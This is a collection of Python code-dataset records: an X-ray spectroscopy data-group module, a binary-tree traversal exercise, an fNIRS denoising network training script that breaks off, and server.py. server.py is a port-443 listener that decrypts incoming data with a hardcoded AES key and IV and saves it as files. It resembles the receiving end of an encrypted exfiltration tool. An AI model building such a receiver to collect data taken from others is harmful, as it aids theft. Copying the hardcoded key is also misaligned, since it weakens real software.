ynew) on a selected list of\n groups (sel); xnew is taken from the reference group or as\n linear space -- xnew = np.linspace(xmin, xmax,\n (xmax-xmin)/xstep) -- if xmin,xmax,xstep are given as input\n\n Keyword arguments\n -----------------\n ref : reference group [0]\n sel : list of groups to interpolate ['*']\n xmin, xmax, xstep : extracted from ref group if not given\n kind : type of interpolation method\n\n Returns\n -------\n None -- output written to attributes: 'xnew', 'ynew'\n\n \"\"\"\n xattr = kws.get('xattr', 'x')\n yattr = kws.get('yattr', 'y')\n xref = self.get(xattr, sel=[ref])[0]\n yref = self.get(yattr, sel=[ref])[0]\n xmin = kws.get('xmin', None)\n xmax = kws.get('xmax', None)\n xstep = kws.get('xstep', None)\n kind = kws.get('kind', self.kwsd['interp']['kind'])\n if (xmin is None) or (xmax is None) or (xstep is None):\n xnew = xref\n else:\n if (xmin is None):\n xmin = xref.min()\n if (xmax is None):\n xmax = xref.max()\n if (xstep is None):\n xstep = min(np.diff(xref))\n xnew = np.linspace(xmin, xmax, (xmax-xmin)/xstep)\n if DEBUG:\n print('DEBUG: {0} interp, {1} to {2}, {3} xstep = {4} points'.format(kind, xmin, xmax, xstep, len(xnew)))\n self.selector(sel)\n for _n, _g in enumerate(self.gs_sel):\n try:\n setattr(_g, 'xnew', xnew)\n setattr(_g, 'ynew', _interp(getattr(_g, xattr), getattr(_g, yattr), xnew, kind=kind))\n if DEBUG:\n print('DEBUG: group {0} interpolated'.format(_n))\n except AttributeError:\n pass\n\n def mksum(self, sel, **kws):\n \"\"\"make a new group as sum of selected groups\n \n Keyword arguments\n -----------------\n sel : an ordered list of selected groups\n sel[0] is the reference for the interpolation\n xattr : attribute for x-axis ['x']\n yattr : attribute for y-axis ['y']\n label : the label for the new sum group ['sum_sel_indx']\n\n Returns\n -------\n None -- output written to given attributes: 'xattr', 'yattr'\n of a new group in datagroup\n \"\"\"\n iref = sel[0]\n xattr = kws.get('xattr', 'x')\n yattr = kws.get('yattr', 'y')\n xref = self.get(xattr, sel=[iref])[0]\n yref = self.get(yattr, sel=[iref])[0]\n label = kws.get('label', 'sum_of_{}'.format(sel))\n self.gs.append(Group())\n gsum = self.gs[-1]\n gsum.label = label\n self.mkinterpxy(ref=iref, sel=sel, xattr=xattr, yattr=yattr)\n for s in sel:\n if (s == iref):\n setattr(gsum, str(xattr), self.gs[s].xnew)\n ysum = self.gs[s].ynew\n else:\n ysum = ysum + self.gs[s].ynew\n setattr(gsum, str(yattr), ysum)\n\n def plotxy(self, **kws):\n \"\"\"wrap to plot() in Larch (if available) otherwise PyMca is\n used (if available)\n \n Keyword arguments\n -----------------\n sel : a list of selected groups\n xattr : attribute for x-axis \n yattr : attribute for y-axis\n replace : True acts as newplot()\n norm : type of normalization to apply\n 'area', 'max-min', 'xflat'\n **kws : as in plot()\n \"\"\"\n # init keyword arguments with educated guesses\n sel = kws.get('sel', self.sel)\n xattr = kws.get('xattr', self.kwsd['plot']['xattr'])\n yattr = kws.get('yattr', self.kwsd['plot']['yattr'])\n norm = kws.get('norm', self.kwsd['plot']['norm'])\n replace = kws.get('replace', self.kwsd['plot']['replace'])\n win = kws.get('win', self.kwsd['plot']['win'])\n title = kws.get('title', self.kwsd['plot']['title'])\n show_legend = kws.get('show_legend', self.kwsd['plot']['show_legend'])\n legend_loc = kws.get('legend_loc', self.kwsd['plot']['legend_loc'])\n xlabel = kws.get('xlabel', self.kwsd['plot']['xlabel'])\n ylabel = kws.get('ylabel', self.kwsd['plot']['ylabel'])\n xmin = kws.get('xmin', self.kwsd['plot']['xmin'])\n xmax = kws.get('xmax', self.kwsd['plot']['xmax'])\n ymin = kws.get('ymin', self.kwsd['plot']['ymin'])\n ymax = kws.get('ymax', self.kwsd['plot']['ymax'])\n xshift = kws.get('xshift', self.kwsd['plot']['xshift'])\n ystack = kws.get('ystack', self.kwsd['plot']['ystack'])\n xscale = kws.get('xscale', self.kwsd['plot']['xscale'])\n yscale = kws.get('yscale', self.kwsd['plot']['yscale'])\n ###\n if (HAS_PYMCA and ( not self._inlarch )):\n if not hasattr(self, 'pw'):\n self.pw = ScanWindow.ScanWindow()\n # geometry good for >1280x800 resolution\n self.pw.setGeometry(50, 50, 700, 700)\n self.pw.show()\n if title:\n self.pw.setGraphTitle(title)\n if xlabel:\n self.pw.setGraphXTitle(xlabel)\n if ylabel:\n self.pw.setGraphYTitle(ylabel)\n if (xmin and xmax):\n self.pw.setGraphXLimits(xmin, xmax)\n if (ymin and ymax):\n print(ymin, ymax)\n self.pw.setGraphYLimits(ymin, ymax)\n # force replot\n self.pw.replot()\n if sel == '*':\n print('Plotting all...')\n self.show()\n sel = range(len(self.gs))\n if replace:\n _n = 0\n else:\n _n = 1\n _m = 0\n for _s in sel:\n # assign x,y\n x = getattr(self.gs[_s], xattr)\n y = getattr(self.gs[_s], yattr)\n # normalize y\n if norm == 'area':\n y = self.norint(y, x=x)\n elif norm == 'max-min':\n y = self.normax(y)\n elif norm == 'xflat':\n y = self.norxafs(self.gs[_s], outattr='flat', **kws)\n elif norm == 'xnorm':\n y = self.norxafs(self.gs[_s], outattr='norm', **kws)\n # plot\n if _n == 0:\n if self._inlarch:\n _plot(x * xscale + xshift,\n y * yscale + ystack * _m,\n label=self.gs[_s].label, title=title, win=win,\n xlabel=xlabel, ylabel=ylabel,\n xmin=xmin, xmax=xmax, ymin=ymin, ymax=ymax,\n show_legend=show_legend, legend_loc=legend_loc,\n new=True, _larch=self._larch)\n if (HAS_PYMCA and ( not self._inlarch )):\n self.pw.addCurve(x * xscale + xshift,\n y * yscale + ystack * _m,\n legend=self.gs[_s].label,\n replace=True)\n _n += 1\n _m += 1\n else:\n if self._inlarch:\n _plot(x * xscale + xshift,\n y * yscale + ystack * _m,\n label=self.gs[_s].label, title=title, win=win,\n show_legend=show_legend, legend_loc=legend_loc,\n new=False, _larch=self._larch)\n if (HAS_PYMCA and ( not self._inlarch )):\n self.pw.addCurve(x * xscale + xshift,\n y * yscale + ystack * _m,\n legend=self.gs[_s].label,\n replace=False)\n _m += 1\n\nclass DataGroupXanes(DataGroup1D):\n \"\"\"DataGroup for XANES scans\"\"\"\n def __init__(self, kwsd=None, _larch=None):\n super(DataGroupXanes, self).__init__(kwsd=kwsd, _larch=_larch)\n\nclass DataGroupExafs(DataGroup1D):\n \"\"\"DataGroup for EXAFS scans\"\"\"\n def __init__(self, kwsd=None, _larch=None):\n super(DataGroupExafs, self).__init__(kwsd=kwsd, _larch=_larch)\n\n def mkchikw(self, kws=[1,2,3]):\n \"\"\"makes kws-weighted groups\n\n Returns\n -------\n None -- output written to attributes: 'chik[1,2,3]'\n\n \"\"\"\n for kw in kws:\n _attr = 'chik'+str(kw)\n for _n, _g in enumerate(self.gs):\n try:\n setattr(_g, _attr, _g.chi*_g.k**int(kw))\n except AttributeError:\n print(\"group {0} ({1}): attr {3} does not exist\".format(_n, _g.label, _attr))\n\n def mkftf(self, **kws):\n \"\"\"forward Fourier transform\n\n Returns\n -------\n None -- output written to attributes: (see xftf doc)\n \"\"\"\n # sel = kws.get('sel', self.sel)\n xattr = kws.get('xattr', self.kwsd['xftf']['xattr'])\n yattr = kws.get('yattr', self.kwsd['xftf']['yattr'])\n kmin = kws.get('kmin', self.kwsd['xftf']['kmin'])\n kmax = kws.get('kmax', self.kwsd['xftf']['kmax'])\n dk = kws.get('dk', self.kwsd['xftf']['dk'])\n window = kws.get('window', self.kwsd['xftf']['window'])\n kweight = kws.get('kweight', self.kwsd['xftf']['kweight'])\n ###\n for _n, _g in enumerate(self.gs):\n try:\n _k = getattr(_g, xattr)\n _chi = getattr(_g, yattr)\n except AttributeError:\n print(\"group {0} ({1}): attr {3} does not exist\".format(_n, _g.label, _attr))\n continue\n \n xftf(_k, _chi, group=_g, kmin=kmin, kmax=kmax, dk=dk,\n window=window, kweight=kweight, _larch=self._larch)\n\n def scale_kwin(self, gchikw):\n \"\"\"returns a scale parameter to amplify the FT transform\n window\"\"\"\n return int(10.2*max(abs(gchikw)))/10.0\n\n def plotexa(self, space='E, K, R, Q', **kws):\n \"\"\"EXAFS default plots\"\"\"\n sel = kws.get('sel', self.sel)\n replace = kws.get('replace', self.kwsd['plot']['replace'])\n xshift = kws.get('xshift', self.kwsd['plot']['xshift'])\n ystack = kws.get('ystack', self.kwsd['plot']['ystack'])\n xscale = kws.get('xscale', self.kwsd['plot']['xscale'])\n yscale = kws.get('yscale', self.kwsd['plot']['yscale'])\n ###\n if 'E' in space.upper():\n self.plotxy(sel=sel, xattr='ene', yattr='norm', win=1, replace=replace,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n xlabel=self.kwsd['plot']['xlabelE'], ylabel=self.kwsd['plot']['ylabelE'])\n if len(sel) == 1 and replace and not sel == '*':\n self.plotxy(sel=sel, xattr='ene', yattr='bkg', win=1, replace=replace,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n color='red', label='bkg')\n if 'K' in space.upper():\n self.plotxy(sel=sel, xattr='k', yattr='chik2', win=2, replace=replace,\n show_legend=False,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n xlabel=self.kwsd['plot']['xlabelK'], ylabel=self.kwsd['plot']['ylabelK'])\n if len(sel) == 1 and replace and not sel == '*':\n _plot(self.gs[sel[0]].k, self.gs[sel[0]].kwin*self.scale_kwin(self.gs[sel[0]].chik2), color='red', win=2, _larch=self._larch)\n if 'R' in space.upper():\n self.plotxy(sel=sel, xattr='r', yattr='chir_mag', win=3, replace=replace,\n show_legend=True,\n xshift=xshift, ystack=ystack, xscale=xscale, yscale=yscale,\n xmin=0, xmax=8, xlabel=self.kwsd['plot']['xlabelR'], ylabel=self.kwsd['plot']['ylabelR'])\n if 'Q' in space.upper():\n print('Not implemented yet.')\n\nclass DataGroupXes(DataGroup1D):\n \"\"\"DataGroup for XES scans\"\"\"\n def __init__(self, kwsd=None, _larch=None):\n super(DataGroupXes, self).__init__(kwsd=kwsd, _larch=_larch)\n\n def mkiads(self, ref=0, plot=False, **kws):\n \"\"\"IAD analysis for XES\n\n Keyword arguments\n -----------------\n ref : reference spectrum (in gs list)\n plot : to show the results in a plot\n\n Returns\n -------\n None -- output written to 'iads' group\n \"\"\"\n _debug = kws.get('DEBUG', DEBUG)\n self.iads = Group()\n self.iads.__name__ = 'IAD analysis'\n self.iads.header = [self.iads.__name__,\n 'Saved on {0}'.format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))]\n self.iads.id = []\n self.iads.lab = []\n self.iads.area = []\n self.iads.max = []\n if not (hasattr(self.gs[ref], 'xnew') or hasattr(self.gs[ref], 'ynew')):\n raise AttributeError(\"First interpolate the data with 'mkinterpxy()'!\")\n for _n, _g in enumerate(self.gs):\n yda = self.norint(_g.ynew, x=_g.xnew) - self.norint(self.gs[ref].ynew, x=self.gs[ref].xnew)\n ydm = self.normax(_g.ynew) - self.normax(self.gs[ref].ynew)\n iad_area = np.trapz(np.abs(yda), x=_g.xnew)\n iad_max = np.trapz(np.abs(ydm), x=_g.xnew)\n if _debug:\n try:\n setattr(_g, 'iad_area', iad_area)\n setattr(_g, 'iad_max', iad_max)\n print('DEBUG: {0}: area {1}\\t max {2}'.format(_n, iad_area, iad_max))\n setattr(_g, 'iad_yda', yda)\n setattr(_g, 'iad_ydm', ydm)\n except AttributeError:\n pass\n self.iads.id.append(_n)\n self.iads.lab.append(_g.label)\n self.iads.area.append(iad_area)\n self.iads.max.append(iad_max)\n if _debug:\n print(\"DEBUG: written attributes 'iad_yda' and 'iad_ydm' for fine check\")\n if plot:\n self.plotiads()\n\n def plotiads(self, order=None, xlist=None, **kws):\n \"\"\"custom plot for IAD analysis\"\"\"\n # as in self.plotxy()\n replace = kws.get('replace', True)\n win = kws.get('win', 2)\n show_legend = kws.get('show_legend', self.kwsd['plot']['show_legend'])\n legend_loc = kws.get('legend_loc', self.kwsd['plot']['legend_loc'])\n xlabel = kws.get('xlabel', 'index')\n ylabel = kws.get('ylabel', 'IAD_area (arb. units)')\n title = kws.get('title', 'IAD analysis')\n xmin = kws.get('xmin', None)\n xmax = kws.get('xmax', None)\n ymin = kws.get('ymin', None)\n ymax = kws.get('ymax', None)\n # specific self.plotiads()\n show_labs = kws.get('show_labs', True)\n labs_rot = kws.get('labs_rot', 45)\n labs_xoff = kws.get('labs_xoff', 0)\n labs_yoff = kws.get('labs_yoff', 0)\n labs_ha = kws.get('labs_ha', 'center')\n labs_va = kws.get('labs_va', 'center')\n \n if xlist is None:\n xlist = self.iads.id\n\n if order:\n _ids = []\n _iads = []\n _labs = []\n for _id in order:\n _ids.append(xlist[_id])\n _iads.append(self.iads.area[_id])\n _labs.append(self.iads.lab[_id])\n else:\n _ids = xlist\n _iads = self.iads.area\n _labs = self.iads.lab\n\n if self._inlarch:\n # plot with Larch\n _scatterplot(_ids, _iads, xmin=xmin, xmax=xmax, ymin=ymin, ymax=ymax,\n xlabel=xlabel, ylabel=ylabel,\n win=win, new=replace, _larch=self._larch)\n if show_labs:\n for _lab, _x, _y in zip(_labs, _ids, _iads):\n _plot_text(_lab, _x+labs_xoff, _y+labs_yoff, win=win, rotation=labs_rot,\n ha=labs_ha, va=labs_va, _larch=self._larch)\n elif HAS_PYMCA:\n # plot with PyMca\n if not hasattr(self, 'pw'):\n self.pw = ScanWindow.ScanWindow()\n self.pw.setGraphTitle(title)\n try:\n self.pw.setGraphXLabel(xlabel)\n except:\n self.pw.setGraphXTitle(xlabel)\n try:\n self.pw.setGraphYLabel(ylabel)\n except: \n self.pw.setGraphYTitle(ylabel)\n if (xmin and xmax):\n self.pw.setGraphXLimits(xmin, xmax)\n if (ymin and ymax):\n self.pw.setGraphYLimits(ymin, ymax)\n # geometry good for >1280x800 resolution\n self.pw.setGeometry(50, 50, 700, 700)\n self.pw._plotPoints = True\n self.pw.showGrid()\n self.pw.show()\n x = np.array(_ids)\n y = np.array(_iads)\n self.pw.addCurve(x, y, legend='IADs', replace=True)\n else:\n print('plotting with matplotlib not implemented yet. do it yourself!')\n \n### LARCH ### \ndef datagroup_xan(kwsd=None, _larch=None):\n \"\"\"utility to perform wrapped operations on a list of XANES data\n groups\"\"\"\n return DataGroupXanes(kwsd=kwsd, _larch=_larch)\n\ndef datagroup_exa(kwsd=None, _larch=None):\n \"\"\"utility to perform wrapped operations on a list of EXAFS data\n groups\"\"\"\n return DataGroupExafs(kwsd=kwsd, _larch=_larch)\n\ndef datagroup_xes(kwsd=None, _larch=None):\n \"\"\"utility to perform wrapped operations on a list of XES data\n groups\"\"\"\n return DataGroupXes(kwsd=kwsd, _larch=_larch)\n\ndef registerLarchPlugin():\n return (MODNAME, {'datagroup_xan' : datagroup_xan,\n 'datagroup_exa' : datagroup_exa,\n 'datagroup_xes' : datagroup_xes})\n\nif __name__ == '__main__':\n pass\n","sub_path":"sloth/collects/datagroup1D.py","file_name":"datagroup1D.py","file_ext":"py","file_size_in_byte":24434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"231796585","text":"import socket\nimport sys\nfrom Crypto.Cipher import AES\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 443\nserver_address = ('127.0.0.1', port)\nprint('')\nprint('===>Server starting on port %s<===' % str(port))\nprint('')\nsock.bind(server_address)\n\nsock.listen(1)\n\ncounter = 1\n\nwhile True:\n try:\n connection, client_address = sock.accept()\n print('[+] Connection received from ', str(client_address))\n\n while True:\n data = connection.recv(2000000000)\n if not data:\n break\n file = \"file_%s\" % str(counter)\n f = open(\"%s\" % file, \"wb\")\n obj = AES.new('thisismysecretstringitis32bytes!'.encode(\"utf8\"), AES.MODE_CFB, 'thismyIV16bytes!'.encode(\"utf8\"))\n msg = obj.decrypt(data)\n f.write(msg)\n counter = counter + 1\n f.close()\n print(\"[+] Download complete for %s\" % file)\n connection.close()\n print(\"DONE!\")\n sys.exit(0)\n \n except Exception as e:\n print(e)\n sys.exit(1)\n \n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171586687","text":"# -*- coding:utf-8 -*-\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n # 返回从上到下每个节点值列表,例:[1,2,3]\n def PrintFromTopToBottom(self, root):\n # write code herele\n if root == None:\n return []\n nodes = [root]\n res = []\n while nodes:\n res.append(nodes[0].val)\n if nodes[0].left is not None:\n nodes.append(nodes[0].left)\n if nodes[0].right is not None:\n nodes.append(nodes[0].right)\n nodes.pop(0)\n return res","sub_path":"python/剑指offer/print_tree_from_top.py","file_name":"print_tree_from_top.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351344053","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 16:35:51 2020\n\n@author: gaoyuanyuan\n\"\"\"\nimport numpy as np\nimport scipy.io\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as tordata\nfrom torch.optim.lr_scheduler import StepLR\nfrom matplotlib import pyplot as plt\n\nclass Dataset(tordata.Dataset):\n def __init__(self, noisy_data, clean_data=None):\n self.noisy_data = noisy_data\n self.clean_data = clean_data\n \n def __getitem__(self, index):\n noisy_data = self.noisy_data[index]\n clean_data = -1\n if self.clean_data is not None:\n clean_data = self.clean_data[index]\n return noisy_data, clean_data\n \n def __len__(self):\n return self.noisy_data.shape[0]\n\n# %% define nn models\n\nclass BasicConv1d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, **kwargs):\n super(BasicConv1d, self).__init__()\n self.conv = nn.Conv1d(in_channels, out_channels, kernel_size, bias=False, **kwargs)\n self.bn = nn.BatchNorm1d(out_channels)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\nclass Net_4layers(nn.Module):\n def __init__(self):\n super(Net_4layers, self).__init__()\n self.conv1 = BasicConv1d(1, 32, 11,padding = 5)\n self.conv2 = BasicConv1d(32,32,3,padding = 1)\n self.conv3 = BasicConv1d(32,32,3,padding = 1)\n self.conv4 = BasicConv1d(32,32,3,padding = 1)\n self.conv5 = BasicConv1d(32,1,3,padding = 1)\n self.dout = nn.Dropout()\n self.pool = nn.MaxPool1d(2,padding = 0)\n self.up = nn.Upsample(scale_factor=2)\n \n def forward_half(self, x):\n x = self.pool(self.conv1(x))\n x = self.pool(self.conv2(x))\n x = self.conv3(x)\n x = self.dout(x)\n x = self.up(x)\n x = self.up(self.conv4(x))\n x = self.conv5(x)\n return x\n \n def forward(self, x):\n b_s, f_n = x.size()\n x = x.view(b_s, 1, f_n)\n x1 = x[:, :, :512]\n x2 = x[:, :, 512:]\n\n x1 = self.forward_half(x1)\n x2 = self.forward_half(x2)\n x = torch.cat((x1, x2), dim=2)\n b_s, _, f_n = x.size()\n x = x.view(b_s, -1)\n return x\nclass Net_8layers(nn.Module):\n def __init__(self):\n super(Net_8layers, self).__init__()\n self.conv1 = BasicConv1d(1, 32, 7,padding = 3)\n self.conv2 = BasicConv1d(32, 64, 3,padding = 1)\n self.conv3 = BasicConv1d(64, 64, 3,padding = 1)\n self.conv4 = BasicConv1d(64, 128, 3, dilation=2, padding = 1)\n self.conv5 = BasicConv1d(128, 128, 3, dilation=2, padding = 1)\n self.fc_1 = nn.Linear(128*64, 1024)\n self.fc_2 = nn.Linear(1024, 128*64)\n self.conv6 = BasicConv1d(128, 64, 3, padding = 1)\n self.conv7 = BasicConv1d(64,64,3,padding = 1)\n self.conv8 = BasicConv1d(64,32,3,padding = 1)\n self.conv9 = BasicConv1d(32,32,3,padding = 1)\n self.conv10 = BasicConv1d(32,1,3,padding = 1)\n self.pool = nn.MaxPool1d(2)\n self.up = nn.Upsample(scale_factor=2)\n self.dout = nn.Dropout()\n \n def forward_half(self, x):\n x = self.conv1(x)\n x = self.pool(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.pool(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = self.pool(x)\n x = F.relu(self.fc_1(x))\n x = self.dout(x)\n x = F.relu(self.fc_2(x))\n x = self.up(x)\n x = self.conv6(x)\n x = self.conv7(x)\n x = self.up(x)\n x = self.conv8(x)\n x = self.conv9(x)\n x = self.up(x)\n x = self.conv10(x)\n return x\n\n def forward(self, x):\n b_s, f_n = x.size()\n x = x.view(b_s, 1, f_n)\n x1 = x[:, :, :512]\n x2 = x[:, :, 512:]\n \n x1 = self.forward_half(x1)\n x2 = self.forward_half(x2)\n \n x = torch.cat((x1, x2), dim=2)\n b_s, _, f_n = x.size()\n x = x.view(b_s, -1)\n \n return x\n \ndef SNR_loss(y_pred):\n batch_size, f_n = y_pred.size()\n y_pred = y_pred.view(batch_size, 2, -1)\n SNR = torch.std(y_pred, axis=2).mean()\n return SNR\n\ndef std_loss(y_pred):\n batch_size, f_n = y_pred.size()\n y_pred = y_pred/1000000\n y_pred = y_pred.view(batch_size, 1, f_n)\n HbO = y_pred[:, :, :512]\n HbR = y_pred[:, :, 512:]\n d1 = 148*HbO+384*HbR\n d2 = 252*HbO+179*HbR\n d = torch.cat((d1,d2),axis = 1)\n d = d*2.376*6\n # batch_size * 2\n std_diff = torch.std(d[:,:,1:]-d[:,:,:-1],axis = 2)\n# max_diff = torch.zeros((batch_size,2,512-1),dtype=torch.double).cuda()\n \n diff = []\n for ii in range(4):\n lag = torch.abs(d[:,:,ii+1:]-d[:,:,:-(ii+1)])\n zero_pad = torch.zeros((batch_size,2,ii)).cuda().double()\n lag_zeros = torch.cat((lag,zero_pad),axis = 2)\n diff.append(lag_zeros.unsqueeze(0))\n# max_diff = torch.max(lag_zeros, max_diff,out=None)\n # 4 * batch_size * 2 *511\n diff = torch.cat(diff, axis=0) \n \n # 1 * batch * 2 * 1\n mc_thresh = (std_diff*10).unsqueeze(-1).unsqueeze(0)\n # 4 * batch_size * 2 *511\n mask_mc = (diff > mc_thresh).double()\n amp_thresh = (torch.ones(diff.size(),dtype=torch.double)*200).cuda()\n mask_amp = (diff > amp_thresh).double()\n mc_loss = (diff * mask_mc).sum() / (mask_mc.sum()+1e-7)\n amp_loss = (diff * mask_amp).sum() / (mask_amp.sum()+1e-7)\n# max_mc = torch.max(max_diff,mc_thresh,out=None)\n# amp_mc = torch.max(max_diff,amp_thresh,out=None)\n# std_loss_value = torch.max(max_mc+amp_mc)\n return mc_loss + amp_loss\n## load data\nnp.random.seed(50)\nX_train = scipy.io.loadmat('Processed_data/HRF_train_noised.mat')\nX_train = X_train['HRF_train_noised'];\nn = X_train.shape[0];\nX_train = np.concatenate((X_train[0:int(n/2),:],X_train[int(n/2):,:]),axis = 1)\nX_val = scipy.io.loadmat('Processed_data/HRF_val_noised.mat')\nX_val = X_val['HRF_val_noised'];\nn = X_val.shape[0];\nX_val = np.concatenate((X_val[0:int(n/2),:],X_val[int(n/2):,:]),axis = 1)\n\n\nX_test = scipy.io.loadmat('Processed_data/HRF_test_noised.mat')\nX_test = X_test['HRF_test_noised'];\nn = X_test.shape[0];\nX_test = np.concatenate((X_test[0:int(n/2),:],X_test[int(n/2):,:]),axis = 1)\n\nY_train = scipy.io.loadmat('Processed_data/HRF_train.mat')\nY_train = Y_train['HRF_train'];\nn = Y_train.shape[0];\nY_train = np.concatenate((Y_train[0:int(n/2),:],Y_train[int(n/2):,:]),axis = 1)\nY_val = scipy.io.loadmat('Processed_data/HRF_val.mat')\nY_val = Y_val['HRF_val'];\nn = Y_val.shape[0];\nY_val = np.concatenate((Y_val[0:int(n/2),:],Y_val[int(n/2):,:]),axis = 1)\nY_test = scipy.io.loadmat('Processed_data/HRF_test.mat')\nY_test = Y_test['HRF_test'];\nn = Y_test.shape[0];\nY_test = np.concatenate((Y_test[0:int(n/2),:],Y_test[int(n/2):,:]),axis = 1)\n\nx = np.concatenate((X_train,X_val),axis = 0)\ny = np.concatenate((Y_train,Y_val),axis = 0)\n\nidx = np.array(range(x.shape[0]))\nnp.random.shuffle(idx)\n\nx = x[idx,:]\ny = y[idx,:]\n\nX_train = x[:int(x.shape[0] * (8/9)),:]\nX_val = x[int(x.shape[0] * (8/9)):,:]\nY_train = y[:int(x.shape[0] * (8/9)),:]\nY_val = y[int(x.shape[0] * (8/9)):,:]\n\nX_real_HbO = scipy.io.loadmat('Processed_data/Real_HbO.mat')\nX_real_HbO = X_real_HbO['Real_HbO'];\nX_real_HbR = scipy.io.loadmat('Processed_data/Real_HbR.mat')\nX_real_HbR = X_real_HbR['Real_HbR'];\nX_real = np.concatenate((X_real_HbO,X_real_HbR),axis = 1)\n\nX_train = X_train*1000000\nX_val = X_val*1000000\nX_test = X_test*1000000\n\nY_train = Y_train*1000000\nY_val = Y_val*1000000\nY_test = Y_test*1000000\n\nX_real = X_real*1000000\n\nprint(X_train.shape)\nprint(X_val.shape)\nprint(X_test.shape)\nprint(X_real.shape)\n\nX_train = X_train[:,:]\nY_train = Y_train[:,:]\nX_val = X_val[:,:]\nY_val = Y_val[:,:]\nX_test = X_test[:,:]\nY_test = Y_test[:,:]\nX_real = X_real[:,:]\n\ntrain_set = Dataset(X_train, Y_train)\nval_set = Dataset(X_val, Y_val)\ntest_set = Dataset(X_test, Y_test) \nreal_set = Dataset(X_real) \n# %% define data loaders\ntrainloader = torch.utils.data.DataLoader(\n dataset = train_set,\n batch_size=512,\n sampler = tordata.RandomSampler(train_set),\n num_workers=2)\n\nvalloader = torch.utils.data.DataLoader(\n dataset = val_set, \n batch_size=512,\n sampler = tordata.SequentialSampler(val_set),\n num_workers=2)\n\ntestloader = torch.utils.data.DataLoader(\n dataset = test_set, \n batch_size=512,\n sampler = tordata.SequentialSampler(test_set),\n num_workers=2)\n\nrealloader = torch.utils.data.DataLoader(\n dataset = real_set, \n batch_size=32,\n sampler = tordata.SequentialSampler(real_set),\n num_workers=2)\n# %% trian and validate\ndata_loaders = {\"train\": trainloader, \"val\": valloader}\nmodel = ['4layers','8layers']\n\nn_epochs = 100\nprint('start')\nfor model_name in model:\n print('Model:', model_name)\n if model_name == '4layers':\n net = Net_4layers().cuda()\n elif model_name == '8layers':\n net = Net_8layers().cuda()\n train_loss1 = []\n val_loss1 = []\n train_loss2 = []\n val_loss2 = []\n train_loss3 = []\n val_loss3 = []\n train_loss = []\n val_loss = []\n optimizer = optim.Adam(net.parameters(), lr=0.01)\n scheduler = StepLR(optimizer, step_size = 50, gamma=0.1)\n lowest_val_loss = 1e6;\n hdf5_filepath = \"networks/\" + model_name\n for epoch in range(n_epochs): # loop over the dataset multiple times\n print('Epoch {}/{}'.format(epoch, n_epochs - 1))\n print('-' * 10)\n for phase in ['train','val']:\n if phase == 'train':\n net.train() # Set model to training mode\n else:\n net.eval()\n running_loss1 = 0.0\n running_loss2 = 0.0\n running_loss3 = 0.0\n running_loss = 0.0\n for i, data in enumerate(data_loaders[phase], 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, y_true = data\n # zero the parameter gradients\n optimizer.zero_grad()\n # forward + backward + optimize\n outputs = net(inputs.cuda().float())\n outputs = outputs.double()\n mse_loss = nn.MSELoss()\n loss1 = mse_loss(outputs, y_true.cuda())\n loss2 = SNR_loss(outputs)\n loss3 = std_loss(outputs)\n \n loss = loss1 + 0.01 *(loss2 + loss3)\n\n if phase == 'train':\n loss.backward()\n optimizer.step()\n running_loss1 += loss1.item()\n running_loss2 += loss2.item()\n running_loss3 += loss3.item()\n running_loss += loss.item()\n epoch_loss1 = running_loss1 / len(data_loaders[phase])\n epoch_loss2 = running_loss2 / len(data_loaders[phase])\n epoch_loss3 = running_loss3 / len(data_loaders[phase])\n epoch_loss = running_loss / len(data_loaders[phase])\n if phase == 'train':\n train_loss1.append(epoch_loss1)\n train_loss2.append(epoch_loss2)\n train_loss3.append(epoch_loss3)\n train_loss.append(epoch_loss) # Set model to training mode\n else:\n val_loss1.append(epoch_loss1)\n val_loss2.append(epoch_loss2)\n val_loss3.append(epoch_loss3)\n val_loss.append(epoch_loss)\n if epoch_loss < lowest_val_loss:\n lowest_val_loss = epoch_loss\n torch.save(net.state_dict(), hdf5_filepath)\n print('{} Loss: {:.5f}; loss1: {:.5f}; loss2: {:.5f};loss3: {:.5f}'.format(\n phase, epoch_loss, epoch_loss1, epoch_loss2, epoch_loss3))\n scheduler.step()\n\n print('Finished Training')\n plt.figure()\n vl, = plt.plot(val_loss1,'r')\n tl, = plt.plot(train_loss1,'b')\n plt.legend([tl,vl],['training loss', 'validation loss'],)\n figurepath = \"Figures/\" + model_name+\"_1\"+\".png\"\n plt.savefig(figurepath, transparent=True)\n plt.figure()\n vl, = plt.plot(val_loss2,'r')\n tl, = plt.plot(train_loss2,'b')\n plt.legend([tl,vl],['training loss', 'validation loss'],)\n figurepath = \"Figures/\" + model_name+\"_2\"+\".png\"\n plt.savefig(figurepath, transparent=True)\n plt.figure()\n vl, = plt.plot(val_loss3,'r')\n tl, = plt.plot(train_loss3,'b')\n plt.legend([tl,vl],['training loss', 'validation loss'],)\n figurepath = \"Figures/\" + model_name+\"_3\"+\".png\"\n plt.savefig(figurepath, transparent=True)\n plt.figure()\n vl, = plt.plot(val_loss,'r')\n tl, = plt.plot(train_loss,'b')\n plt.legend([tl,vl],['training loss', 'validation loss'],)\n figurepath = \"Figures/\" + model_name+\"_all\"+\".png\"\n plt.savefig(figurepath, transparent=True)\n print('Finished Fig saving')\n\n trainlosspath = \"Processed_data/train_loss_\" + model_name+\".txt\"\n np.savetxt(trainlosspath, np.array(train_loss), fmt=\"%s\")\n vallosspath = 